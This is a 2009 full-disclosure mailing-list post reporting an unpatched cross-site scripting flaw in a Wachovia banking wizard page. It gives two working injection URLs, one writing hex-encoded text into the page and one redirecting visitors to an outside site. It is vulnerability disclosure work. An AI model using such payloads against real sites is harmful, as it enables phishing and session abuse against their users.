[<prev] [next>] [day] [month] [year] [list]
Message-ID: <214bc2720908300633v3322a254h29edf74094001d05@mail.gmail.com>
Date: Sun, 30 Aug 2009 08:33:09 -0500
From: Marshall Whittaker <marshallwhittaker@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Wachovia Banking Wizard - XSS - PoC
This is only a proof of concept, please use this responsibly.
This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 30
2009.
Very simple standard cross site scripting exploit. As you can see, it works
with HEX as well. Bad characters obviously arn't filtered correctly.
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=
><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script
%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html
";%3B</script>
--oxagast
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists